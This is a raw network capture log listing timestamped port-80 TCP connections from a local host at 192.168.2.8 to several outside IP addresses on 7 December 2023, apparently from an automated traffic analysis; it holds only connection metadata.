                                                                                                                      Dec 7, 2023 13:43:19.962165117 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.962187052 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.962243080 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:21.175136089 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:22.191262007 CET4971980192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:22.388159990 CET804971969.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:22.388284922 CET4971980192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:22.388601065 CET4971980192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:22.585576057 CET804971969.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:22.690159082 CET804971969.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:22.690239906 CET804971969.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:22.690332890 CET4971980192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:23.893857956 CET4971980192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:24.909804106 CET4972080192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:25.108151913 CET804972069.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:25.108256102 CET4972080192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:25.108484030 CET4972080192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:25.305113077 CET804972069.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:25.401052952 CET804972069.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:25.401082039 CET804972069.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:25.401290894 CET4972080192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:25.401468992 CET4972080192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:25.598481894 CET804972069.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:30.914352894 CET4972180192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:31.188896894 CET8049721194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:31.189064026 CET4972180192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:31.189667940 CET4972180192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:31.469887972 CET8049721194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:31.470525026 CET8049721194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:31.470609903 CET8049721194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:31.470700979 CET8049721194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:31.470704079 CET4972180192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:31.470715046 CET8049721194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:31.470777035 CET4972180192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:32.690675974 CET4972180192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:33.706943989 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:33.988018036 CET8049722194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:33.988213062 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:33.988975048 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:34.269705057 CET8049722194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:34.270386934 CET8049722194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:34.270404100 CET8049722194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:34.270416975 CET8049722194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:34.270427942 CET8049722194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:34.270490885 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:34.270554066 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:34.271986961 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:35.503724098 CET4972280192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:36.519279957 CET4972380192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:36.797907114 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:36.798132896 CET4972380192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:36.798561096 CET4972380192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:37.077076912 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:37.077419043 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:37.077439070 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:37.077533007 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:37.077584982 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:37.077671051 CET8049723194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:37.077672005 CET4972380192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:37.077716112 CET4972380192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:38.300084114 CET4972380192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.317795038 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.597408056 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.597523928 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.597889900 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.881437063 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.881903887 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882057905 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882097960 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882132053 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.882210970 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882273912 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.882350922 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882397890 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.882570982 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882608891 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882611036 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.882646084 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882682085 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:39.882683992 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.882783890 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:39.883183956 CET4972480192.168.2.8194.58.112.174
                                                                                                                      Dec 7, 2023 13:43:40.162683010 CET8049724194.58.112.174192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:56.894690037 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:57.230434895 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:57.230565071 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:57.230798960 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:57.568059921 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069253922 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069284916 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069295883 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069304943 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069463015 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:58.069505930 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069520950 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069575071 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:58.069612980 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069624901 CET8049725217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:58.069672108 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:58.737565041 CET4972580192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:43:59.753846884 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:00.074996948 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:00.078392982 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:00.078624964 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:00.400310040 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.021805048 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.021826982 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.021838903 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.021852016 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.021867990 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.021881104 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.022124052 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:01.022170067 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:01.022205114 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.022216082 CET8049726217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:01.022289038 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:01.581430912 CET4972680192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:02.597704887 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:02.918584108 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:02.918687105 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:02.919095993 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:03.241509914 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.241607904 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.748363018 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.748394966 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.748414040 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.748430967 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.748449087 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.748487949 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:03.748545885 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:03.749007940 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.749042988 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.749049902 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:03.749058962 CET8049727217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:03.749111891 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:04.425182104 CET4972780192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:05.441169024 CET4972880192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:05.771128893 CET8049728217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:05.771219969 CET4972880192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:05.771411896 CET4972880192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:06.100096941 CET8049728217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:06.698573112 CET8049728217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:06.698585033 CET8049728217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:06.698837042 CET4972880192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:06.699246883 CET4972880192.168.2.8217.144.107.2
                                                                                                                      Dec 7, 2023 13:44:07.026973963 CET8049728217.144.107.2192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:12.046298027 CET4972980192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:12.288935900 CET804972964.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:12.289042950 CET4972980192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:12.289243937 CET4972980192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:12.532447100 CET804972964.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:12.532464981 CET804972964.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:12.532660007 CET4972980192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:13.800333977 CET4972980192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:14.816088915 CET4973080192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:15.059582949 CET804973064.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:15.059740067 CET4973080192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:15.059993029 CET4973080192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:15.304295063 CET804973064.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:15.304325104 CET804973064.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:15.304373026 CET4973080192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:16.565722942 CET4973080192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:17.581650019 CET4973180192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:17.824162960 CET804973164.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:17.824315071 CET4973180192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:17.824562073 CET4973180192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:18.069305897 CET804973164.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:18.070101023 CET804973164.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:18.070163012 CET804973164.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:18.070218086 CET4973180192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:19.331435919 CET4973180192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.347758055 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.590878010 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.590964079 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.591294050 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.858994007 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859024048 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859039068 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859098911 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859174013 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.859180927 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859252930 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.859535933 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859580994 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.859626055 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859776974 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859817982 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:20.859859943 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859925985 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:20.859966993 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.102408886 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102431059 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102443933 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102521896 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102632046 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.102632046 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.102679968 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102729082 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102772951 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.102782965 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102833986 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102874041 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.102901936 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103008986 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103054047 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.103101015 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103142977 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103272915 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.103485107 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.346287012 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.177666903 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:27.335283041 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.335448980 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:27.335797071 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:27.491251945 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.496795893 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.496902943 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.497009039 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:28.846960068 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:29.862961054 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:30.018623114 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.018739939 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:30.018948078 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:30.174422026 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.181188107 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.181392908 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.181456089 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:31.534394979 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.550323963 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.705632925 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.705734015 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.706060886 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.861320019 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.861427069 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.867677927 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.867700100 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.867810965 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:34.206327915 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.222606897 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.377962112 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.378134966 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.378384113 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.541174889 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.550909042 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.552335024 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.552418947 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.552459002 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.707710981 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:40.888748884 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.085009098 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.085102081 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.085377932 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.281553984 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281639099 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281702995 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281744957 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281810999 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.281899929 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:42.596908092 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:43.613791943 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:43.809638023 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:43.809834003 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:43.810091019 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:44.005928993 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006035089 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006094933 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006110907 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006345034 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:44.006345034 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:45.315836906 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.331895113 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.528038025 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.528162003 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.528450966 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.724680901 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724694014 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724708080 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724741936 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724787951 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724797010 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.724833012 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:48.034444094 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.050551891 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.247123003 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.247219086 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.247971058 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.444348097 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444380999 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444396019 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444408894 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444502115 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.445553064 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.642431021 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:54.589751005 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:54.778505087 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:54.778783083 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:54.779516935 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:54.968569040 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137350082 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137650967 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137667894 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137686014 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137706041 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.137789965 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.137793064 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137985945 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138026953 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138133049 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138209105 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138226986 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138251066 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138377905 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138417959 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138531923 CET804974168.178.195.71192.168.2.8
